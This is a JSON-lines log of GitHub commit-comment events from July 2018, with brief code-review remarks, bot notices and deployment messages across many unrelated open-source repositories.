{"id":"7923677881","type":"CommitCommentEvent","actor":{"login":"YousefED"},"repo":{"name":"YonatanKra/cesium"},"payload":{"comment":{"id":29607662,"position":48,"line":237,"path":"Source/DataSources/Entity.js","commit_id":"bdd0cca966104ef464b021f3452a6ce68cbc547f","created_at":"2018-07-05T14:43:01Z","updated_at":"2018-07-05T14:43:01Z","author_association":"NONE","body":"@YonatanKra aren't you missing a `this._forceUpdate = value`?"}},"created_at":"2018-07-05T14:43:01Z"}
{"id":"7923679029","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29607670,"position":null,"line":null,"path":null,"commit_id":"2473ea1407b2add7108fc5ff52f384384d55cc75","created_at":"2018-07-05T14:43:13Z","updated_at":"2018-07-05T14:43:13Z","author_association":"CONTRIBUTOR","body":"@silverwind proposal up in #677  another reason why checkmarks are better, cause these render in different sizes and also looks untidy md table in raw\r\n\r\n![capture](https://user-images.githubusercontent.com/31389848/42329976-f24647ce-8069-11e8-9a69-4a9919429d8e.PNG)\r\n\r\n\r\n"}},"created_at":"2018-07-05T14:43:13Z"}
{"id":"7923680362","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29607679,"position":50,"line":50,"path":"Gravity/Gravity/DAL/SQL/SqlDao.Get.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-05T14:43:26Z","updated_at":"2018-07-05T14:43:26Z","author_association":"COLLABORATOR","body":"used the same logic as in GetArtifactGuidsMappingsToColumnNames"}},"created_at":"2018-07-05T14:43:26Z"}
{"id":"7923681824","type":"CommitCommentEvent","actor":{"login":"boffbowsh"},"repo":{"name":"alphagov/gds-way"},"payload":{"comment":{"id":29607682,"position":null,"line":null,"path":null,"commit_id":"0b600f8c7a10e0535ea3298891f5f20edf241a1d","created_at":"2018-07-05T14:43:38Z","updated_at":"2018-07-05T14:43:38Z","author_association":"MEMBER","body":"I've replied with a comment.\n\n*Paul Bowsher*\nGOV.UK Programme Tech Lead\nGovernment Digital Service\n\n\n\n\nOn Thu, 5 Jul 2018 at 15:31, Peter Thornton-Grimes <notifications@github.com>\nwrote:\n\n> Last tech writer edits\n>\n> @boffbowsh just made some last edits, making this clearer and adding sub\n> headings so the tools we're talking about stand out, how does this look?\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/alphagov/gds-way/commit/0b600f8c7a10e0535ea3298891f5f20edf241a1d\n>\n"}},"created_at":"2018-07-05T14:43:38Z"}
{"id":"7923682280","type":"CommitCommentEvent","actor":{"login":"tklengyel"},"repo":{"name":"OpenXT/xenclient-oe"},"payload":{"comment":{"id":29607684,"position":16,"line":143,"path":"recipes-openxt/openxt/openxt-measuredlaunch/seal-system","commit_id":"1a0432540f685a68695864c6655f0b8928225e02","created_at":"2018-07-05T14:43:43Z","updated_at":"2018-07-05T14:43:43Z","author_association":"CONTRIBUTOR","body":"I'll use the new function added in #944 as this is evidently confusing right now :)"}},"created_at":"2018-07-05T14:43:43Z"}
{"id":"7923686111","type":"CommitCommentEvent","actor":{"login":"hhristov-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29607701,"position":13,"line":13,"path":"Gravity/Gravity/Globals/SQLConstants.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-05T14:44:20Z","updated_at":"2018-07-05T14:44:20Z","author_association":"COLLABORATOR","body":"removed redundant \"sql\" from each string."}},"created_at":"2018-07-05T14:44:20Z"}
{"id":"7923687160","type":"CommitCommentEvent","actor":{"login":"eastglow"},"repo":{"name":"eastglow/eastglow.github.io"},"payload":{"comment":{"id":29607705,"position":null,"line":null,"path":null,"commit_id":"2fb70b66681b3295aad3d91de2ad237b93e07d77","created_at":"2018-07-05T14:44:30Z","updated_at":"2018-07-05T14:44:30Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-05T14:44:30Z"}
{"id":"7923688520","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29607712,"position":null,"line":null,"path":null,"commit_id":"a5dcbe6c9ded411b0273ff3f9d4dd4ed922503f8","created_at":"2018-07-05T14:44:43Z","updated_at":"2018-07-05T14:44:43Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mastercard: Židle org 1 a org 2](https://trello.com/c/N5LQguEV/579-mastercard-%C5%BEidle-org-1-a-org-2)"}},"created_at":"2018-07-05T14:44:43Z"}
{"id":"7923688837","type":"CommitCommentEvent","actor":{"login":"dGazizullin"},"repo":{"name":"dGazizullin/News-Cataloge"},"payload":{"comment":{"id":29607715,"position":49,"line":129,"path":"index.php","commit_id":"9757f2f0e3355f998f1d6b9391e54856183fa93b","created_at":"2018-07-05T14:44:47Z","updated_at":"2018-07-05T14:44:47Z","author_association":"OWNER","body":"Какие условия сюда добавить?"}},"created_at":"2018-07-05T14:44:47Z"}
{"id":"7923695625","type":"CommitCommentEvent","actor":{"login":"akervern"},"repo":{"name":"nuxeo/doc.nuxeo.com-content"},"payload":{"comment":{"id":29607729,"position":57,"line":163,"path":"src/nxdoc/nuxeo-server/upgrading-the-nuxeo-platform/upgrade-from-lts-2017-following-fast-tracks.md","commit_id":"6b89b8c5686214d6a2c83e9c881389f22da08af8","created_at":"2018-07-05T14:45:50Z","updated_at":"2018-07-05T14:45:50Z","author_association":"MEMBER","body":"It is more an release note too"}},"created_at":"2018-07-05T14:45:50Z"}
{"id":"7923696217","type":"CommitCommentEvent","actor":{"login":"indrajitr"},"repo":{"name":"sorin-ionescu/prezto"},"payload":{"comment":{"id":29607732,"position":null,"line":null,"path":null,"commit_id":"cd7082299467a26d443e597f1fd2f02506a45a6a","created_at":"2018-07-05T14:45:55Z","updated_at":"2018-07-05T14:45:55Z","author_association":"COLLABORATOR","body":"@belak nothing specific, just for sake of consistency across the repo. Historically, @sorin-ionescu used to prefer compact version for path patterns."}},"created_at":"2018-07-05T14:45:55Z"}
{"id":"7923698699","type":"CommitCommentEvent","actor":{"login":"ncopa"},"repo":{"name":"gliderlabs/docker-alpine"},"payload":{"comment":{"id":29607738,"position":null,"line":null,"path":null,"commit_id":"8487b91a84a6aad0965921fa821b5222d0ae7c2d","created_at":"2018-07-05T14:46:19Z","updated_at":"2018-07-05T14:46:19Z","author_association":"COLLABORATOR","body":"wrong commit message. sorry"}},"created_at":"2018-07-05T14:46:19Z"}
{"id":"7923703040","type":"CommitCommentEvent","actor":{"login":"akervern"},"repo":{"name":"nuxeo/doc.nuxeo.com-content"},"payload":{"comment":{"id":29607752,"position":67,"line":173,"path":"src/nxdoc/nuxeo-server/upgrading-the-nuxeo-platform/upgrade-from-lts-2017-following-fast-tracks.md","commit_id":"6b89b8c5686214d6a2c83e9c881389f22da08af8","created_at":"2018-07-05T14:46:58Z","updated_at":"2018-07-05T14:46:58Z","author_association":"MEMBER","body":"Release note"}},"created_at":"2018-07-05T14:46:58Z"}
{"id":"7923704010","type":"CommitCommentEvent","actor":{"login":"timdurniak"},"repo":{"name":"timdurniak/sample-cloud-native-toolchain-tutorial-20180705133416327"},"payload":{"comment":{"id":29607753,"position":null,"line":null,"path":null,"commit_id":"62d8dfbd516e40d5a79a1f5cc14743357ad639e8","created_at":"2018-07-05T14:47:08Z","updated_at":"2018-07-05T14:47:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/67732414-1ba4-4b03-b3cf-4cbc317bf563?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180705133416327\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/9a6a6061-dc0a-477a-b0ed-0a1889a5e3b7?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180705133416327\") deployed [sample-cloud-native-toolchain-tutorial-20180705133416327](https://github.com/timdurniak/sample-cloud-native-toolchain-tutorial-20180705133416327/releases/tag/deploy-ibm-yp-us-south-tdurniak-us.ibm.com-prod-20180705-144702 \"deploy-ibm-yp-us-south-tdurniak-us.ibm.com-prod-20180705-144702\") to [prod](https://console.bluemix.net/apps/50fffdfb-7ce0-4672-9a01-de363923f4fd?env_id=ibm:yp:us-south \"ibm:yp:us-south:tdurniak@us.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-05T14:47:08Z"}
{"id":"7923706779","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29607758,"position":null,"line":null,"path":null,"commit_id":"c3654874044223057570967df051e04ee9e5d95b","created_at":"2018-07-05T14:47:33Z","updated_at":"2018-07-05T14:47:33Z","author_association":"COLLABORATOR","body":"You may want to create an issue and point to this conversation from there so we don't lose track. I'll double-check things shortly (though, there tend to be a lot of descriptions that got \"listified\" in most examples without any issue, only when there's extra information does it sometimes get lost), but I can't take a look just this second and I don't want to forget."}},"created_at":"2018-07-05T14:47:33Z"}
{"id":"7923710701","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29607771,"position":null,"line":null,"path":null,"commit_id":"c3654874044223057570967df051e04ee9e5d95b","created_at":"2018-07-05T14:48:09Z","updated_at":"2018-07-05T14:48:09Z","author_association":"COLLABORATOR","body":"Oh, I see you already did, nevermind that last comment!"}},"created_at":"2018-07-05T14:48:09Z"}
{"id":"7923717489","type":"CommitCommentEvent","actor":{"login":"enricofer"},"repo":{"name":"enricofer/go2mapillary"},"payload":{"comment":{"id":29607782,"position":4,"line":26,"path":"mapillary_coverage.py","commit_id":"c66bb567b3f229131d4c6a073696dea732753744","created_at":"2018-07-05T14:49:10Z","updated_at":"2018-07-05T14:49:10Z","author_association":"OWNER","body":"mmm. you are right. its simper. Thanks for the tip."}},"created_at":"2018-07-05T14:49:10Z"}
{"id":"7923720946","type":"CommitCommentEvent","actor":{"login":"ranaparamveer"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29607790,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T14:49:44Z","updated_at":"2018-07-05T14:49:44Z","author_association":"NONE","body":"@Kisty yes. :)"}},"created_at":"2018-07-05T14:49:44Z"}
{"id":"7923722225","type":"CommitCommentEvent","actor":{"login":"OPARA-PROSPER"},"repo":{"name":"Rickokello/pixel-art"},"payload":{"comment":{"id":29607795,"position":null,"line":null,"path":null,"commit_id":"26ab05d4221bfb9f84ca32c353700b9b7fd4cad2","created_at":"2018-07-05T14:49:56Z","updated_at":"2018-07-05T14:49:56Z","author_association":"NONE","body":"Wow. Your codebase is empty"}},"created_at":"2018-07-05T14:49:56Z"}
{"id":"7923723687","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29607802,"position":null,"line":null,"path":null,"commit_id":"c619caf856d8a5d05595554aa0f404cd399eee14","created_at":"2018-07-05T14:50:12Z","updated_at":"2018-07-05T14:50:12Z","author_association":"CONTRIBUTOR","body":"I am curious on [how the software situation will evolve further](https://systeme.lip6.fr/pipermail/cocci/2018-July/005162.html \"Checking evolution around software build parameters\") around [similar programming interfaces](https://stackoverflow.com/questions/35220750/obtaining-a-canonical-file-path \"Obtaining a canonical file path\")."}},"created_at":"2018-07-05T14:50:12Z"}
{"id":"7923725315","type":"CommitCommentEvent","actor":{"login":"Kisty"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29607806,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T14:50:26Z","updated_at":"2018-07-05T14:50:26Z","author_association":"NONE","body":"@ranaparamveer has already published instructions to get the library on jitpack. Also, I see that @MarcoMirisola's fork addresses leaks, may be worth applying to that ( https://github.com/MarcoMirisola/android-sqlite-asset-helper/commit/a831cc084f5a8b3485b94e7770870030c9ef1ad9). \r\n\r\nPerhaps we could find some candidates who would be up for maintaining it?"}},"created_at":"2018-07-05T14:50:26Z"}
{"id":"7923726060","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29607807,"position":null,"line":null,"path":null,"commit_id":"f34cdd86be30a4e57ad2703c40d3097d2331445a","created_at":"2018-07-05T14:50:32Z","updated_at":"2018-07-05T14:50:32Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-05T14:50:32Z"}
{"id":"7923730873","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"DisciplinaOU/disciplina"},"payload":{"comment":{"id":29607815,"position":99,"line":99,"path":"specs/disciplina/educator/api/spec.org","commit_id":"2314b0371cd18dd9072633b514eff1a321dfeb84","created_at":"2018-07-05T14:51:14Z","updated_at":"2018-07-05T14:51:14Z","author_association":"COLLABORATOR","body":"I think you should note explicitly what happens to ungraded non-final assignments. Doesn't they matter, or you can't get a final assignment if you have ungraded non-final ones?"}},"created_at":"2018-07-05T14:51:14Z"}
{"id":"7923743683","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29607831,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T14:53:12Z","updated_at":"2018-07-05T14:53:12Z","author_association":"MEMBER","body":"@TheLimeGlass the `[(all [[of] the]|the)]` pattern is a new thing **you** started using without considering Skript doesn't do it in other places, now we're the ones who have to change it in other classes to keep consistency.\r\n\r\nIn my opinion, `(all [of] the|the|all)` is the best option, Skript already has this kind of format on some patterns (CondCompare) so I don't see why not."}},"created_at":"2018-07-05T14:53:12Z"}
{"id":"7923744698","type":"CommitCommentEvent","actor":{"login":"YonatanKra"},"repo":{"name":"YonatanKra/cesium"},"payload":{"comment":{"id":29607833,"position":48,"line":237,"path":"Source/DataSources/Entity.js","commit_id":"bdd0cca966104ef464b021f3452a6ce68cbc547f","created_at":"2018-07-05T14:53:20Z","updated_at":"2018-07-05T14:53:20Z","author_association":"OWNER","body":"Defined in line 185. Would that do the trick?"}},"created_at":"2018-07-05T14:53:20Z"}
{"id":"7923746775","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"yotsuba1022/scjp"},"payload":{"comment":{"id":29607839,"position":null,"line":null,"path":null,"commit_id":"caf3ebcd6ea3e87701564384bdd3e42d1b851fc8","created_at":"2018-07-05T14:53:40Z","updated_at":"2018-07-05T14:53:40Z","author_association":"OWNER","body":"JDBC基本操作步驟:\r\n\r\n1. 註冊 JDBC driver\r\n2. 使用 DB URL/USER NAME/USER PASSWORD 來開啟連接\r\n3. 透過 statement/preparedStatement 物件進行查詢(Query)\r\n4. 將查詢回傳的 ResultSet 物件依據商業邏輯需要進行處理\r\n5. 在 finally 區塊依序關閉 resultSet -> statement -> connection, 且關閉之前都要先確認是否有參照\r\n\r\n![image](https://user-images.githubusercontent.com/838924/42330490-e0d5ad4a-80a5-11e8-99ae-6c1a2861fccb.png)\r\n"}},"created_at":"2018-07-05T14:53:40Z"}
{"id":"7923747305","type":"CommitCommentEvent","actor":{"login":"Kisty"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29607840,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T14:53:45Z","updated_at":"2018-07-05T14:53:45Z","author_association":"NONE","body":"Also, @jgilfelt once there's someone to transfer it, can you hand over the repo somehow so that the old abandoned one doesn't get seen? https://help.github.com/articles/transferring-a-repository-owned-by-your-personal-account/"}},"created_at":"2018-07-05T14:53:45Z"}
{"id":"7923749076","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29607843,"position":null,"line":null,"path":null,"commit_id":"b767114e558fd6315f2e6a250abab0f25cc3f4c5","created_at":"2018-07-05T14:54:01Z","updated_at":"2018-07-05T14:54:01Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-708](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-708).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-708-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T14:54:01Z"}
{"id":"7923753863","type":"CommitCommentEvent","actor":{"login":"leangjia"},"repo":{"name":"glpi-project/glpi"},"payload":{"comment":{"id":29607854,"position":null,"line":null,"path":null,"commit_id":"d5017d7de5636bfe5a2f13e64c685423723f7f33","created_at":"2018-07-05T14:54:45Z","updated_at":"2018-07-05T14:54:45Z","author_association":"NONE","body":"Goodjob!"}},"created_at":"2018-07-05T14:54:45Z"}
{"id":"7923754557","type":"CommitCommentEvent","actor":{"login":"perryprog"},"repo":{"name":"Terminal/terminal.ink"},"payload":{"comment":{"id":29607855,"position":null,"line":null,"path":null,"commit_id":"604a49720a24e32da1ebf52304fbc423724e379b","created_at":"2018-07-05T14:54:51Z","updated_at":"2018-07-05T14:54:51Z","author_association":"NONE","body":"Rip"}},"created_at":"2018-07-05T14:54:51Z"}
{"id":"7923764770","type":"CommitCommentEvent","actor":{"login":"chris-stg"},"repo":{"name":"chris-stg/mod-gift-guide"},"payload":{"comment":{"id":29607869,"position":null,"line":null,"path":null,"commit_id":"ce56ce935f5db9c30aea02c12c256321b76c6db0","created_at":"2018-07-05T14:56:24Z","updated_at":"2018-07-05T14:56:24Z","author_association":"OWNER","body":"Created multidev environment [mod-gift-guide#ci-41](https://dashboard.pantheon.io/sites/72035e91-bbeb-4fea-aa37-97b7ccd79d43#ci-41).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-41-mod-gift-guide.pantheonsite.io/)"}},"created_at":"2018-07-05T14:56:24Z"}
{"id":"7923765786","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29607873,"position":53,"line":80,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T14:56:34Z","updated_at":"2018-07-05T14:56:34Z","author_association":"CONTRIBUTOR","body":"No, I mean for the case when there is no existing consumer available, but a new one needs to be created ..."}},"created_at":"2018-07-05T14:56:34Z"}
{"id":"7923766518","type":"CommitCommentEvent","actor":{"login":"snopoke"},"repo":{"name":"dimagi/commcare-hq"},"payload":{"comment":{"id":29607876,"position":null,"line":null,"path":null,"commit_id":"8f61e0a46f14a664a4cfb9381784e87e690ed0ec","created_at":"2018-07-05T14:56:40Z","updated_at":"2018-07-05T14:56:40Z","author_association":"CONTRIBUTOR","body":":+1: thanks this is great!"}},"created_at":"2018-07-05T14:56:40Z"}
{"id":"7923770948","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"DisciplinaOU/disciplina"},"payload":{"comment":{"id":29607885,"position":118,"line":118,"path":"specs/disciplina/educator/api/spec.org","commit_id":"2314b0371cd18dd9072633b514eff1a321dfeb84","created_at":"2018-07-05T14:57:21Z","updated_at":"2018-07-05T14:57:21Z","author_association":"COLLABORATOR","body":"`/s/submission/assignment`"}},"created_at":"2018-07-05T14:57:21Z"}
{"id":"7923771461","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"yeezy69/phpmyadmin"},"payload":{"comment":{"id":29607891,"position":null,"line":null,"path":null,"commit_id":"0f247c5a621495b8b84d5acc35470409ccfa1f49","created_at":"2018-07-05T14:57:26Z","updated_at":"2018-07-05T14:57:26Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-05T14:57:26Z"}
{"id":"7923777585","type":"CommitCommentEvent","actor":{"login":"ranaparamveer"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29607902,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T14:58:24Z","updated_at":"2018-07-05T14:58:24Z","author_association":"NONE","body":"@Kisty, the leak issue mentioned by MarcoMirisola/android-sqlite-asset-helper@a831cc0 is already patched into repo i'm maintaining. Please check and let me know if any other issue needs to be resolved."}},"created_at":"2018-07-05T14:58:24Z"}
{"id":"7923786941","type":"CommitCommentEvent","actor":{"login":"Snow-Pyon"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29607915,"position":60,"line":60,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T14:59:47Z","updated_at":"2018-07-05T14:59:47Z","author_association":"MEMBER","body":"You could do this on init instead."}},"created_at":"2018-07-05T14:59:47Z"}
{"id":"7923787345","type":"CommitCommentEvent","actor":{"login":"jlotrab"},"repo":{"name":"jlotrab/APIARY"},"payload":{"comment":{"id":29607916,"position":null,"line":null,"path":null,"commit_id":"c87e7458b4af230743d9371aedb40b2bbf949039","created_at":"2018-07-05T14:59:50Z","updated_at":"2018-07-05T14:59:50Z","author_association":"OWNER","body":"Why this change?"}},"created_at":"2018-07-05T14:59:50Z"}
{"id":"7923789534","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29607924,"position":null,"line":null,"path":null,"commit_id":"d08f0544244f588bc0552ed8c3ef78deabeeabf4","created_at":"2018-07-05T15:00:12Z","updated_at":"2018-07-05T15:00:12Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-05T15:00:12Z"}
{"id":"7923793331","type":"CommitCommentEvent","actor":{"login":"pellmann"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29607934,"position":53,"line":80,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T15:00:44Z","updated_at":"2018-07-05T15:00:44Z","author_association":"CONTRIBUTOR","body":"FMPOV the createConsumer() method handles this."}},"created_at":"2018-07-05T15:00:44Z"}
{"id":"7923797403","type":"CommitCommentEvent","actor":{"login":"TheBentoBox"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29607952,"position":null,"line":null,"path":null,"commit_id":"07829ff78b5e0ae3a41bc03b338028b3ea541b45","created_at":"2018-07-05T15:01:22Z","updated_at":"2018-07-05T15:01:22Z","author_association":"NONE","body":"I agree with @Snow-Pyon. IMO `[(all [[of] the]|the)]` looks kinda gross. Even if something like that is easy for _us_ to read, the syntax should be as simple as possible so it's clear to people who can't read it as easily."}},"created_at":"2018-07-05T15:01:22Z"}
{"id":"7923813147","type":"CommitCommentEvent","actor":{"login":"conory"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29608000,"position":null,"line":null,"path":null,"commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T15:03:49Z","updated_at":"2018-07-05T15:03:49Z","author_association":"MEMBER","body":"네. 원래 합치기에도 unload 코드를 넣어었는 데 말씀하신 문제 때문에 뺐습니다."}},"created_at":"2018-07-05T15:03:49Z"}
{"id":"7923813489","type":"CommitCommentEvent","actor":{"login":"Knifepony"},"repo":{"name":"ThatMisterJay/endsieg"},"payload":{"comment":{"id":29608002,"position":null,"line":null,"path":null,"commit_id":"201b7bf1a0dab1682db928c39a5034201b8f23c8","created_at":"2018-07-05T15:03:53Z","updated_at":"2018-07-05T15:03:53Z","author_association":"COLLABORATOR","body":"oops"}},"created_at":"2018-07-05T15:03:53Z"}
{"id":"7923815499","type":"CommitCommentEvent","actor":{"login":"ekasnh"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29608012,"position":null,"line":null,"path":null,"commit_id":"19463882763e601427cbfdc2b399d689c4c6e9d3","created_at":"2018-07-05T15:04:12Z","updated_at":"2018-07-05T15:04:12Z","author_association":"CONTRIBUTOR","body":"😠😠😠😠😠\r\n\r\nAaaaaahh"}},"created_at":"2018-07-05T15:04:12Z"}
{"id":"7923816381","type":"CommitCommentEvent","actor":{"login":"Kisty"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29608018,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T15:04:20Z","updated_at":"2018-07-05T15:04:20Z","author_association":"NONE","body":"@ranaparamveer It looks like you haven't applied the `super.close()` and the other `db.close()` call from @MarcoMirisola's patch"}},"created_at":"2018-07-05T15:04:20Z"}
{"id":"7923821302","type":"CommitCommentEvent","actor":{"login":"fredericDelaporte"},"repo":{"name":"nhibernate/nhibernate-core"},"payload":{"comment":{"id":29608035,"position":null,"line":null,"path":null,"commit_id":"5d77746809f3f9aaaad0ebcf874becef015067ae","created_at":"2018-07-05T15:05:07Z","updated_at":"2018-07-05T15:05:07Z","author_association":"MEMBER","body":"> The reason is that having to basically self-implement the whole \"DynamicProxy\" feature also includes lazy initialization which we would rather not have to implement \"again\".\r\n\r\nIf I understand it correctly, your application is mixing direct usage of its `ViewModelProxyFactory` for not-yet proxified entities while setting NHibernate to use it too.\r\nIf instead your application could always use directly  `ViewModelProxyFactory`, be the entity already proxified or not, somewhat double proxifying the entity in the affirmative case, then your `ViewModelProxyFactory` would not need to implement the lazy-loading: NHibernate would be set to use its default proxy factory, and when a `ViewModelProxy` is built around a NHibernate proxy, it would delegate the lazy-loading to the NHibernate proxy.\r\n\r\n> I've got some experience with IL-weaving so an extension point for weaving might be an option for us.\r\nAre there any plans to add one and/or would you consider a PR?\r\n\r\nOf course we will consider a PR, but we may reject PRs if we are not convinced of their added value in regard to their complexity or potential to add issues.\r\nFor the use case presented here, I tend to think it would be better to decouple it entirely from the NHibernate own proxification logic, as already written. (Of course maybe there could be other use cases for extending the static proxy, or maybe the case presented here cannot be decoupled from NHibernate for some good reasons my external viewpoint cannot see.)\r\n\r\n> On \"first sight\" I'd expect the following extension points to suffice:\r\n>- addings members to woven type, about [here](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L86)\r\n>- adding arbitrary content to ctor [before return](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L169)\r\n>- adding the ability to extend [`ImplementCallMethodOnImplementation`](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L366) at least before and after [`EmitCallImplementation`](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L379)\r\n>  - Optionally another branch [here](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L135) to skip `EmitCallImplementation` in case of adding a method that does not exist on the base-class, entirely.\r\n\r\nI think most of these needs could be covered by switching `NHibernateProxyBuilder` to public, switching a bunch of its methods to virtual, un-sealing `StaticProxyFactory` and adding in it a virtual method to allow supplying your own proxy builder by overriding it. (For consistency something similar would likely have to be done for the `FieldInterceptorProxyBuilder` too.)\r\n(One of the main drawback it will have is to publicly expose more APIs, which hinders evolution capabilities since we have to avoid binary breaking changes, forbidding to change these APIs as we like unless releasing a new major version.)\r\n\r\n> Sidenote:\r\n\r\nDiscussed [here](https://github.com/nhibernate/nhibernate-core/pull/1451#discussion_r156355711)."}},"created_at":"2018-07-05T15:05:07Z"}
{"id":"7923823014","type":"CommitCommentEvent","actor":{"login":"shiyaroo"},"repo":{"name":"shiyaroo/shop1"},"payload":{"comment":{"id":29608038,"position":null,"line":null,"path":null,"commit_id":"5b82e8cdea511524fc26defeec655f97f06f9661","created_at":"2018-07-05T15:05:23Z","updated_at":"2018-07-05T15:05:23Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-05T15:05:23Z"}
{"id":"7923825141","type":"CommitCommentEvent","actor":{"login":"nathangibson"},"repo":{"name":"biblia-arabica/zotero2bibl"},"payload":{"comment":{"id":29608046,"position":null,"line":null,"path":null,"commit_id":"d508afb691df6877d58abda3b332956d807a288b","created_at":"2018-07-05T15:05:43Z","updated_at":"2018-07-05T15:05:43Z","author_association":"NONE","body":"FYI @wsalesky "}},"created_at":"2018-07-05T15:05:43Z"}
{"id":"7923831984","type":"CommitCommentEvent","actor":{"login":"conory"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29608094,"position":157,"line":666,"path":"classes/display/HTMLDisplayHandler.php","commit_id":"35b73eec0b4ada480ae00247a3aec44d899bb405","created_at":"2018-07-05T15:06:50Z","updated_at":"2018-07-05T15:06:50Z","author_association":"MEMBER","body":"앗! 그렇네요ㅎ"}},"created_at":"2018-07-05T15:06:50Z"}
